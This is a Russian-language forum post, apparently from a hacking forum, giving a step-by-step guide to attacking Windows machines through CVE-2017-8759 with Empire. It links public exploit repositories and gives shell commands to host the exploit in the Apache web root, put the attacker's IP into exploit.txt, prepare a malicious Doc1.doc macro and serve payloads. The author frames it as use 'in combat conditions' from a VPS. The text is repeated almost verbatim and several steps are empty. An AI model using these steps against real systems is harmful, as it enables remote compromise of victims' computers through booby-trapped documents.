Всем привет, познакомлю Вас с методикой атак: Exploit CVE-2017-8759 (Microsoft Windows .NET Framework RCE)
https://github.com/bhdresh/CVE-2017-8759
https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Будем проводить атаку совместно с Empire, перейдем в папку где крутится сервис Apache : cd /var/www/html
от себя скажу что все это дело запускаем на VPS-e это для боевых условий!
копируем скрипт в папку html : git clone https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
перейдем в нее и удалим лишнее : rm -rf cmd.hta LICENSE README.md
запустим сервис Apache : servise apache2 start
отредактируем exploit.txt , а именно поставим свой IP в 14 строке.
далее отредактируем файл: Doc1.doc , настроим его макрос:
Настраиваем Empire :
настраиваем порт (или корректируем все ранее): python -m SimpleHTTPServer 8080
можно еще и так (видео)
Metasploit
cobalt-strike
Удачи!)
Ссылка скрыта от гостей
https://github.com/bhdresh/CVE-2017-8759
https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
Будем проводить атаку совместно с Empire, перейдем в папку где крутится сервис Apache : cd /var/www/html
от себя скажу что все это дело запускаем на VPS-e это для боевых условий!
копируем скрипт в папку html : git clone https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
перейдем в нее и удалим лишнее : rm -rf cmd.hta LICENSE README.md
запустим сервис Apache : servise apache2 start
отредактируем exploit.txt , а именно поставим свой IP в 14 строке.
далее отредактируем файл: Doc1.doc , настроим его макрос:
Настраиваем Empire :
настраиваем порт (или корректируем все ранее): python -m SimpleHTTPServer 8080
можно еще и так (видео)
Metasploit
cobalt-strike
Удачи!)